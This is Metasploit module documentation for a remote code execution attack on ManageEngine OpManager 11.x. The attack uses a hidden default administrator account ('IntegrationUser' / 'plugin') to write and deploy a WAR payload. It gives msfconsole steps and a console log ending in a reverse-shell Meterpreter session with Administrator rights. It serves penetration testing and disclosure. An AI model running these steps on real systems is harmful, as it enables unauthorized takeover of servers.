## Description

This module exploits a default credential vulnerability in ManageEngine OpManager, where a
default hidden account "IntegrationUser" with administrator privileges exists. The account
has a default password of "plugin" which can not be reset through the user interface. By
log-in and abusing the default administrator's SQL query functionality, it's possible to
write a WAR payload to disk and trigger an automatic deployment of this payload.

## Vulnerable Application

[OpManager](https://www.manageengine.com/network-monitoring/) is an application designed
around "integrated network management".

This module has been verified against the following OpManager versions:

* v11.0
* v11.4
* v11.5
* v11.6

Installers:

* [OpManager Installers](http://archives.manageengine.com/opmanager/)

## Verification Steps

1. Start msfconsole
1. `use exploit/windows/http/manage_engine_opmanager_rce`
1. `set RHOST <IP addr of target system running OpManager>`
1. `exploit`
1. You should get a working Meterpreter session

## Scenarios

### Targeting Windows Server 2012 running OpManager v11.5

```
msf > use exploit/windows/http/manage_engine_opmanager_rce 
msf exploit(manage_engine_opmanager_rce) > set RHOST 10.0.2.12
RHOST => 10.0.2.12
msf exploit(manage_engine_opmanager_rce) > exploit

[*] Started reverse TCP handler on 10.0.2.4:4444 
[*] Access login page
[*] Location is [ http://10.0.2.12/apiclient/ember/index.jsp;jsessionid=B5903DA9A1DBA5592690EC69AF7FA27D ]
[*] Following redirection
[*] Retrieved API key [ 2eb58a9f104f29c8520d23243502cf5b ]
[*] Executing SQL queries
[*] Attempting to launch payload in deployed WAR...
[*] Attempting to launch payload in deployed WAR...
[*] Attempting to launch payload in deployed WAR...
[*] Sending stage (49667 bytes) to 10.0.2.12
[*] Meterpreter session 1 opened (10.0.2.4:4444 -> 10.0.2.12:49496) at 2017-06-20 15:13:50 -0500
[+] Deleted tomcat//webapps//r63xuE3q1gOAZsCQuJ.war
[!] This exploit may require manual cleanup of 'tomcat//webapps//r63xuE3q1gOAZsCQuJ' on the target

meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer    : WIN-SI597APFOFH
OS          : Windows Server 2008 6.2 (amd64)
Meterpreter : java/windows
```